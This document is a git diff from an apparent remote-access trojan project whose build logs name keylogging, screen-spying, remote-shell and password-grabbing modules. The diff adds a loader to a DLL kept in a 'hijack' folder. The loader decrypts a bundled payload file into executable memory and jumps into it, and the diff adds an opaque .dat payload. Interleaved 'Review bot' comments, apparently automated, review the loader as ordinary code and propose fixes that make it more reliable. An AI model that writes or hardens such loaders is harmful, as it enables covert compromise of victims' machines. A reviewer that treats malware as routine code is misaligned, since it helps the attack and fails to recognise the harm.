diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo
index 5611911..1909a4e 100644
Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ
diff --git a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm b/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm
deleted file mode 100644
index eaa1bbd..0000000
Binary files a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm and /dev/null differ
diff --git a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal b/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal
deleted file mode 100644
index baa69ae..0000000
Binary files a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal and /dev/null differ
diff --git a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log
index fae17d0..22c6f33 100644
--- a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log
+++ b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log
@@ -1 +1,41 @@
+f:\myapp\ccremote\bin\server\ccmaindll.lib
+f:\myapp\ccremote\bin\server\ccmaindll.exp
+f:\myapp\ccremote\bin\server\ccmaindll.ipdb
+f:\myapp\ccremote\bin\server\ccmaindll.iobj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\dllmain.obj
+f:\myapp\ccremote\bin\server\ccmaindll.dll
+f:\myapp\ccremote\bin\server\ccmaindll.pdb
 f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\ccmaindll.write.1u.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.delete.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.read.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.write.1.tlog
diff --git a/CcMainDll/CcMainDll/Release/CcMainDll.log b/CcMainDll/CcMainDll/Release/CcMainDll.log
index a167622..894e063 100644
--- a/CcMainDll/CcMainDll/Release/CcMainDll.log
+++ b/CcMainDll/CcMainDll/Release/CcMainDll.log
@@ -164,8 +164,6 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVe
 d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
 f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
 d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
-f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(256): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
- d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
 StrCry.cpp
 f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(8): warning C4018: “<=”: 有符号/无符号不匹配
 f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(10): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
@@ -174,6 +172,6 @@ LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略
 正在生成代码
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\regeditopt.cpp(113): warning C4700: 使用了未初始化的局部变量“NameSize”
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(260): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
- All 381 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ All 377 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
 已完成代码的生成
 CcMainDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\CcMainDll\..\..\bin\server\CcMainDll.dll
diff --git a/CcMainDll/wsc/Debug/wsc.Build.CppClean.log b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log
index 1b77ab9..e2f4e21 100644
--- a/CcMainDll/wsc/Debug/wsc.Build.CppClean.log
+++ b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log
@@ -3,16 +3,19 @@ f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.pdb
 f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.idb
 f:\myapp\ccremote\ccmaindll\wsc\debug\pch.obj
 f:\myapp\ccremote\ccmaindll\wsc\debug\dllmain.obj
-f:\myapp\ccremote\bin\hijack\wsc.ilk
 f:\myapp\ccremote\bin\hijack\wsc.dll
+f:\myapp\ccremote\bin\hijack\wsc.ilk
 f:\myapp\ccremote\bin\hijack\wsc.pdb
 f:\myapp\ccremote\bin\hijack\wsc.lib
 f:\myapp\ccremote\bin\hijack\wsc.exp
+f:\myapp\ccremote\bin\hijack\wsc.ipdb
+f:\myapp\ccremote\bin\hijack\wsc.iobj
 f:\myapp\ccremote\ccmaindll\wsc\..\..\bin\hijack\wsc.dll
 f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.command.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.read.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.write.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.delete.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.read.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.write.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\wsc.write.1u.tlog
diff --git a/CcMainDll/wsc/Debug/wsc.log b/CcMainDll/wsc/Debug/wsc.log
index 30edfb5..45dd7cb 100644
--- a/CcMainDll/wsc/Debug/wsc.log
+++ b/CcMainDll/wsc/Debug/wsc.log
@@ -1,13 +1,15 @@
 C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
 pch.cpp
 dllmain.cpp
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(9): warning C4018: “<=”: 有符号/无符号不匹配
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(11): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4838: 从“int”转换到“char”需要收缩转换
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4309: “初始化”: 截断常量值
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4838: 从“int”转换到“char”需要收缩转换
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4309: “初始化”: 截断常量值
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4838: 从“int”转换到“char”需要收缩转换
-f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(13): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(15): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(108): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+ d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4309: “初始化”: 截断常量值
 正在创建库 ..\..\bin\hijack\wsc.lib 和对象 ..\..\bin\hijack\wsc.exp
 wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll
diff --git a/CcMainDll/wsc/Release/wsc.Build.CppClean.log b/CcMainDll/wsc/Release/wsc.Build.CppClean.log
index feb3b92..f5f911d 100644
--- a/CcMainDll/wsc/Release/wsc.Build.CppClean.log
+++ b/CcMainDll/wsc/Release/wsc.Build.CppClean.log
@@ -2,16 +2,18 @@ f:\myapp\ccremote\ccmaindll\wsc\release\wsc.pch
 f:\myapp\ccremote\ccmaindll\wsc\release\vc141.pdb
 f:\myapp\ccremote\ccmaindll\wsc\release\pch.obj
 f:\myapp\ccremote\ccmaindll\wsc\release\dllmain.obj
-f:\myapp\ccremote\ccmaindll\release\wsc.dll
-f:\myapp\ccremote\ccmaindll\release\wsc.pdb
-f:\myapp\ccremote\ccmaindll\release\wsc.lib
-f:\myapp\ccremote\ccmaindll\release\wsc.exp
-f:\myapp\ccremote\ccmaindll\release\wsc.ipdb
-f:\myapp\ccremote\ccmaindll\release\wsc.iobj
+f:\myapp\ccremote\bin\hijack\wsc.dll
+f:\myapp\ccremote\bin\hijack\wsc.pdb
+f:\myapp\ccremote\bin\hijack\wsc.lib
+f:\myapp\ccremote\bin\hijack\wsc.exp
+f:\myapp\ccremote\bin\hijack\wsc.ipdb
+f:\myapp\ccremote\bin\hijack\wsc.iobj
+f:\myapp\ccremote\ccmaindll\wsc\..\..\bin\hijack\wsc.dll
 f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.command.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.read.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.write.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.delete.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.read.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.write.1.tlog
 f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\wsc.write.1u.tlog
diff --git a/CcMainDll/wsc/Release/wsc.log b/CcMainDll/wsc/Release/wsc.log
index d4a13f4..e98bb81 100644
--- a/CcMainDll/wsc/Release/wsc.log
+++ b/CcMainDll/wsc/Release/wsc.log
@@ -1,16 +1,18 @@
-G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
+C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
 pch.cpp
 dllmain.cpp
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(9): warning C4018: “<=”: 有符号/无符号不匹配
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(11): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4838: 从“int”转换到“char”需要收缩转换
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4309: “初始化”: 截断常量值
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4838: 从“int”转换到“char”需要收缩转换
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4309: “初始化”: 截断常量值
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4838: 从“int”转换到“char”需要收缩转换
-g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(13): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(15): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(108): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+ d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4309: “初始化”: 截断常量值
 正在创建库 ..\..\bin\hijack\wsc.lib 和对象 ..\..\bin\hijack\wsc.exp
 正在生成代码
- All 8 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ All 10 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
 已完成代码的生成
- wsc.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll
+ wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll
diff --git a/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate
index fd0ad53..3f4a20c 100644
--- a/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate
+++ b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate
@@ -1,2 +1,2 @@
 #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
-Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|
+Release|Win32|F:\myapp\CcRemote\CcMainDll\|
diff --git a/CcMainDll/wsc/dllmain.cpp b/CcMainDll/wsc/dllmain.cpp
index 4b16d0f..1bfd9fb 100644
--- a/CcMainDll/wsc/dllmain.cpp
+++ b/CcMainDll/wsc/dllmain.cpp
@@ -1,7 +1,11 @@
 // dllmain.cpp : 定义 DLL 应用程序的入口点。
 #include "pch.h"
+#include
 #define STR_CRY_LENGTH 0 //加密字符串的长度
+#define SIZE 256
+
+
 char* uncode(char* str) {
 int len = str[0];
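Review bot: The added `#include` directive carries no header name, so the line as shown does not compile; the angle-bracket operand was probably lost in rendering, but since this file's new code (hunk `@@ -51,6 +55,94 @@`) calls `fopen`, `fseek`, `ftell` and `fread`, the line should read `#include <cstdio>` explicitly rather than relying on whatever `pch.h` pulls in. `SIZE` is also defined with the same name and value in strCodeTest.cpp (hunk `@@ -8,6 +8,26 @@`) and the two sides only work while they agree on the on-disk layout; a shared header, or at least a comment `// must match the writer in strCodeTest.cpp`, would keep them in step. The two empty `+` lines before `uncode` are stray whitespace.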
@@ -51,6 +55,94 @@ extern "C" __declspec(dllexport) void eiwqiothhahndna()
 }
+//------------------------------------------------------------
+//加密前的密码表
+// Size : 256 (0x100)
+//------------------------------------------------------------
+unsigned char EncryptTable[256] = { 0 };
+
+//------------------------------------------------------------
+//加密后的密码表,可用于解密时的校验
+// Size : 256 (0x100)
+//------------------------------------------------------------
+unsigned char ChcekTable[256] = { 0 };
+
+
+
+void EncryptFunc(unsigned char *SourceBytes, unsigned char *EncryptBytes, DWORD nLength)
+{
+ DWORD nOffsetNum = 0, nTargetNum = 0, nLastNum = 0;
+ unsigned char TargetCode = '\x0', OffsetCode = '\x0', LastCode = '\x0';
+ for (DWORD i = 0; i < nLength; i++)
+ {
+ //取密码表标志位Code
+ TargetCode = EncryptBytes[((i + 1) % 0x100)];
+ //取偏移Code的偏移
+ nOffsetNum = (TargetCode + nOffsetNum) % 0x100;
+ //取密码表偏移Code
+ OffsetCode = EncryptBytes[nOffsetNum];
+ //交换密码表数值
+ EncryptBytes[nOffsetNum % 0x100] = EncryptBytes[((i + 1) % 0x100)];
+ EncryptBytes[((i + 1) % 0x100)] = OffsetCode;
+ //取最终加密Code偏移
+ nLastNum = (TargetCode + OffsetCode) % 0x100;
+ //获取异或用的字符串
+ LastCode = EncryptBytes[nLastNum];
+ //取被加密的字符,异或
+ SourceBytes[i] ^= LastCode;
+ }
+ //在此下断观察SourceBytes和CryptData
+ return;
+}
+
+
+FILE * pFile;
+long lSize;
+unsigned char * buffer;
+size_t result;
+
+bool InitTestReflectiveLoader(char * SelfPath)
+{
+ // 一个不漏地读入整个文件,只能采用二进制方式打开
+ //pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
+ pFile = fopen(SelfPath, "rb");
+
+ if (pFile == NULL)
+ {
+ fputs("File error", stderr);
+ //printf("open file fail");
+ return false;
+ }
+
+ // 获取文件大小
+ fseek(pFile, 0, SEEK_END);
+ lSize = ftell(pFile);
+ rewind(pFile);
+
+ // 分配内存存储整个文件
+ buffer = (unsigned char*)VirtualAlloc(NULL, sizeof(char)*lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+ if (buffer == NULL)
+ {
+ fputs("Memory error", stderr);
+ //printf("Memory alloc falil");
+ return false;
+
+ }
+
+ // 将文件拷贝到buffer中
+ result = fread(buffer, 1, lSize, pFile);
+ if (result != lSize)
+ {
+ fputs("Reading error", stderr);
+ //printf("Load file to memory falil");
+ return false;
+
+ }
+ return true;
+
+}
+
 /*
 为什么C++生成的Dll函数名带有@?如“_Abcd2@4”后面是数字2加@还有个4
 _stdcall调用约定的函数会有@,后面的数字表示参数总共所占字节数,这是因为_stdcall函数需要被调用者清空堆栈,所以需要知道参数所占大小
@@ -103,8 +195,31 @@ extern "C" __declspec(dllexport) int __stdcall run(HMODULE hLibModule)
 memset(pMainDat, 0, Str_Kernel32[STR_CRY_LENGTH]);
 delete pMainDat;
+ if (InitTestReflectiveLoader(SelfPath)) {
+
+
+ unsigned char * buffers = (unsigned char*)malloc(sizeof(char)*result - SIZE - SIZE);
+
+ memcpy(EncryptTable, buffer, SIZE);
+
+ memcpy(ChcekTable, buffer + SIZE, SIZE);
+
+ memcpy(buffers, buffer + SIZE + SIZE, result - SIZE - SIZE);
+
+ EncryptFunc(buffers, EncryptTable, result - SIZE - SIZE);
+
+ if (memcmp(ChcekTable, EncryptTable, SIZE) == 0)
+ {
+ DWORD lpflOldProtect = 0;
+ VirtualProtect(buffers, result - SIZE - SIZE, PAGE_EXECUTE_READWRITE, &lpflOldProtect);
+ __asm {
+ call buffers
+ }
+ }
+ }
+
+
- MessageBoxA(NULL, SelfPath, "test", NULL);
 return FreeLibrary(hLibModule);
diff --git a/CcRemote/.vs/CcRemote/v15/.suo b/CcRemote/.vs/CcRemote/v15/.suo
index 8cea8d3..243e30b 100644
Binary files a/CcRemote/.vs/CcRemote/v15/.suo and b/CcRemote/.vs/CcRemote/v15/.suo differ
diff --git a/bin/hijack/Cc28256.dat b/bin/hijack/Cc28256.dat
new file mode 100644
index 0000000..51ed8dc
Binary files /dev/null and b/bin/hijack/Cc28256.dat differ
diff --git a/bin/hijack/wsc.dll b/bin/hijack/wsc.dll
index 033e081..29a570d 100644
Binary files a/bin/hijack/wsc.dll and b/bin/hijack/wsc.dll differ
diff --git a/bin/hijack/wsc.lib b/bin/hijack/wsc.lib
index 3756d48..78af932 100644
Binary files a/bin/hijack/wsc.lib and b/bin/hijack/wsc.lib differ
diff --git a/bin/server/CcMainDll.dll b/bin/server/CcMainDll.dll
index ccad5ee..e8e7613 100644
Binary files a/bin/server/CcMainDll.dll and b/bin/server/CcMainDll.dll differ
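Review bot: `InitTestReflectiveLoader` never calls `fclose(pFile)` on any path, so every call leaks the stream it stores in the global `pFile`, and the stream stays open for the life of the process. `fseek` and `ftell` are unchecked, so a failing `ftell` leaves `lSize` at -1 and `sizeof(char)*lSize` reaches `VirtualAlloc` as a wrapped size, while `result != lSize` compares `size_t` against `long`, the same signed/unsigned mismatch the build logs in this commit already flag for this file. After `ftell`, add `if (lSize < 0) { fclose(pFile); return false; }`, and close the stream before each `return` once `fread` has run.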
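Review bot: In `run`, `result - SIZE - SIZE` wraps when the file read by `InitTestReflectiveLoader` is shorter than 512 bytes (`result` is `size_t`), so `malloc` is asked for a huge block and the following `memcpy` writes through the NULL it returns; the `malloc` result is never checked, `VirtualProtect`'s return value is ignored, and neither `buffers` nor the `VirtualAlloc`'d `buffer` is released before `FreeLibrary`. A guard `if (result <= 2 * SIZE) return FreeLibrary(hLibModule);` before the allocation, plus `if (buffers == NULL)` after it, removes the wrap and the NULL write. Note also that `memcmp(ChcekTable, EncryptTable, SIZE)` only confirms the key table reached its expected state and says nothing about the origin of the file at `SelfPath` (set outside this hunk), so whoever can write that file decides what this process executes; that risk should at least be documented on `run`. `run` begins outside the hunk.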
diff --git a/bin/server/CcMainDll.lib b/bin/server/CcMainDll.lib
index 8ba34ae..15c89c4 100644
Binary files a/bin/server/CcMainDll.lib and b/bin/server/CcMainDll.lib differ
diff --git a/strCodeTest/.vs/strCodeTest/v15/.suo b/strCodeTest/.vs/strCodeTest/v15/.suo
index f100536..61ef4bd 100644
Binary files a/strCodeTest/.vs/strCodeTest/v15/.suo and b/strCodeTest/.vs/strCodeTest/v15/.suo differ
diff --git a/strCodeTest/Debug/strCodeTest.exe b/strCodeTest/Debug/strCodeTest.exe
index 7f6767f..2f33d5e 100644
Binary files a/strCodeTest/Debug/strCodeTest.exe and b/strCodeTest/Debug/strCodeTest.exe differ
diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log
index 19cc4a2..beffe4b 100644
--- a/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log
@@ -1,12 +1 @@
-f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.pdb
-f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.idb
-f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.obj
-f:\myapp\ccremote\strcodetest\debug\strcodetest.ilk
 f:\myapp\ccremote\strcodetest\debug\strcodetest.exe
-f:\myapp\ccremote\strcodetest\debug\strcodetest.pdb
-f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.command.1.tlog
-f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.read.1.tlog
-f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.write.1.tlog
-f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.command.1.tlog
-f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.read.1.tlog
-f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.write.1.tlog
diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.log b/strCodeTest/strCodeTest/Debug/strCodeTest.log
index bb8d013..4a50dd4 100644
--- a/strCodeTest/strCodeTest/Debug/strCodeTest.log
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.log 
@@ -1,9 +1,11 @@
  strCodeTest.cpp
-g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(18): warning C4018: “<=”: 有符号/无符号不匹配
-g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(20): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
-g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(32): warning C4018: “<=”: 有符号/无符号不匹配
-g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(34): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
-g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(53): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
- g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
-g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(119): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
- strCodeTest.vcxproj -> G:\CcRemote\CcRemote\strCodeTest\Debug\strCodeTest.exe
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(38): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(40): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(52): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(54): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(73): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+ d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(139): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(225): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(225): warning C4309: “初始化”: 截断常量值
+ strCodeTest.vcxproj -> F:\myapp\CcRemote\strCodeTest\Debug\strCodeTest.exe
diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate
index 7b55ff4..5bbebeb 100644
--- a/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate
@@ -1,2 +1,2 @@
 #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
-Debug|Win32|G:\CcRemote\CcRemote\strCodeTest\|
